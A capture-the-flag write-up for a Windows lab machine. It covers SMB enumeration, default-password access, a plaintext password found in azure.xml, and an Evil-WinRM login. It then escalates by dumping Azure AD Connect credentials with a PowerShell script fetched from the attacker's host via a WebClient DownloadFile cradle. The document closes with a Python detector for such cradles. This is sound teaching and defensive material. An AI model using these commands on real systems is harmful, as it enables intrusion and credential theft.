Note: In an attempt to be OSCP friendly, NONE of my write-ups will utilize Metasploit. Zero. Zip. Tell your friends.
As always, we’ll start with a basic Nmap scan: nmap -sC -sV 10.10.10.X

As you can see, there’s a ton of stuff open on this Windows box. SMB on 445 and the LDAP ports stand out for starters. With this in mind, we can use enum4linux to try to enumerate more information from this machine.
Type enum4linux without any flags to see what options are available. After reviewing the help file, we’ll want to use option -a. Thus, our command looks like this: enum4linux -a 10.10.10.X


Enum4linux can enumerate some basic Active Directory information, so that’s one of the reasons we chose to use it for our enumeration. Looking through the results we can see the usernames of some of the users on this box:

SMBClient
Since the SMB ports are open on our target machine, we can try to connect to any SMB shares that are on the computer using smbclient. Documentation is available here: https://www.tldp.org/HOWTO/SMB-HOWTO-8.html
You can type something like smbclient -L 10.10.10.X -U <username> to try to log in as a user. Obviously, this requires knowing their password:

After trying several users, and several passwords that could be considered default, I was able to gain access with the user SABatchJobs and the password SABatchJobs

We can see here that there are several directories in it. So let’s use SMB to try to connect to one: smbclient //10.10.10.X/azure_uploads -U SABatchJobs

And there’s nothing in there, so let’s try the admin$ one: smbclient //10.10.10.X/admin$ -U SABatchJobs

And we can’t get in there, so let’s continue: smbclient //10.10.10.X/users$ -U SABatchJobs

And there’s some stuff. So let’s try digging into a few of the directories there:

In the 2nd one we look into, there’s a file called azure.xml, so let’s get it and then see what we can find out about it. Type get azure.xml and it’ll download to your current directory on your Kali box.

And then cat the file from your Kali box.

And we’ve got a password, so let’s put this in a file so we can get to it quickly should we need it: echo '4n0therD4y@n0th3r$' > mhope_password.txt
Evil-WinRM
Now that we have a username and password, let’s see if we can leverage them to gain further access to the computer. We’re going to use Evil-WinRM, which takes advantage of Windows Remote Management. More information about it can be found here: https://github.com/Hackplayers/evil-winrm
But first, we’ve gotta install it. If you scroll down far enough on their website/GitHub page, there are instructions.

We can then run it with the following syntax: evil-winrm -u mhope -p '4n0therD4y@n0th3r$' -i 10.10.10.X

From here, you can navigate to the Desktop and get the user.txt flag.
Getting Root
When we run the command whoami we can see that the user is part of a group that appears to have some type of administrator access, based on its name.

Utilizing Google, we come across a link that appears to dump Azure credentials using AD Connect.

After some reading (and some trial and error) I came across a tool on GitHub that I think will do what I want it to: Azure-ADConnect.
We’ll start by navigating to the webpage and clicking on the Raw button

Next, copy the URL and then from your Kali terminal, do a wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

Now the problematic part, getting this script over to our target Windows machine.
Simple HTTP Server
I tried several ways initially to get this file over there. First, I tried using SMB. I created a new directory called smb and moved the Azure-ADConnect.ps1 file into it, and then set up my smbserver with the following command: impacket-smbserver <share name> <share path>

Then from the victim Windows machine I tried to map a drive to my Kali’s smb share with the following command: net use <drive letter to assign> <\\target IP\shared folder name> or net use t: \\10.10.14.17\smb

And there’s a security issue. Bummer. So I killed my smbserver on Kali and looked at the help file and lo and behold, there’s an option for SMB2 support: -smb2support

So we’ll update our command: impacket-smbserver -smb2support smb smb

And then try to re-map our drive to our Kali smb share:

And get told promptly to fuck off. Hrm. Sounds like a job for Python’s Simple HTTP server.
After killing the SMB server on my Kali box, I made sure I was in the same directory the .ps1 script was in and then started the Python HTTP server: python -m SimpleHTTPServer 80
And then from the Windows machine, we’ll use PowerShell to copy the script to our target machine: powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/Azure-ADConnect.ps1','C:\Users\mhope\Documents\Azure-ADConnect.ps1')"

Next, we need to import the script/module we just copied into PowerShell: import-module ./Azure-ADConnect.ps1
And then we’ll run the script: Azure-ADConnect -server 127.0.0.1 -db ADSync

Now, we can kill our Evil-WinRM session and then re-establish it with the administrator account and the password we just discovered:

Navigate to the Desktop folder and there’s the root flag.
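
From the defender's side, the WebClient download used above is easy to spot if PowerShell script-block logging (Event ID 4104) is enabled. The following is an added example, not part of the original write-up: it scores logged script text for DownloadFile calls. The sample events are constructed, and the indicator names and threshold are assumptions chosen for illustration.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed script-block log text (as recorded under Event ID 4104); not real captures.
SAMPLE_EVENTS = [
    r"(new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/Azure-ADConnect.ps1','C:\Users\mhope\Documents\Azure-ADConnect.ps1')",
    r"(New-Object Net.WebClient).DownloadFile('https://updates.example.com/agent.msi','C:\Windows\Temp\agent.msi')",
    r"Get-ChildItem C:\Users\mhope\Documents",
]

# Matches .DownloadFile('<url>','<dest>') with either quote style.
CRADLE = re.compile(
    r"\.DownloadFile\(\s*['\"](?P<url>[^'\"]+)['\"]\s*,\s*['\"](?P<dest>[^'\"]+)['\"]\s*\)",
    re.IGNORECASE,
)
USER_WRITABLE = re.compile(r"\\(users|temp|programdata)\\", re.IGNORECASE)
SCRIPT_EXTS = (".ps1", ".psm1", ".bat", ".vbs", ".js", ".exe", ".dll")


def is_ip_literal(host):
    """True when the URL host is a bare IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False


def analyze(script_text):
    """Return url, dest and indicator list for a DownloadFile call, or None."""
    m = CRADLE.search(script_text)
    if not m:
        return None
    url, dest = m.group("url"), m.group("dest")
    parsed = urlparse(url)
    reasons = []
    if parsed.scheme.lower() == "http":
        reasons.append("plain-http")
    if is_ip_literal(parsed.hostname):
        reasons.append("ip-literal-host")
    if dest.lower().endswith(SCRIPT_EXTS):
        reasons.append("script-or-binary-dest")
    if USER_WRITABLE.search(dest):
        reasons.append("user-writable-dest")
    return {"url": url, "dest": dest, "reasons": reasons}


def triage(events, threshold=3):
    """Keep events whose DownloadFile call trips at least `threshold` indicators."""
    return [a for a in map(analyze, events) if a and len(a["reasons"]) >= threshold]
```

Only the first sample event clears the threshold; the HTTPS download from a named host to a temp directory trips a single indicator and is left for lower-priority review.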
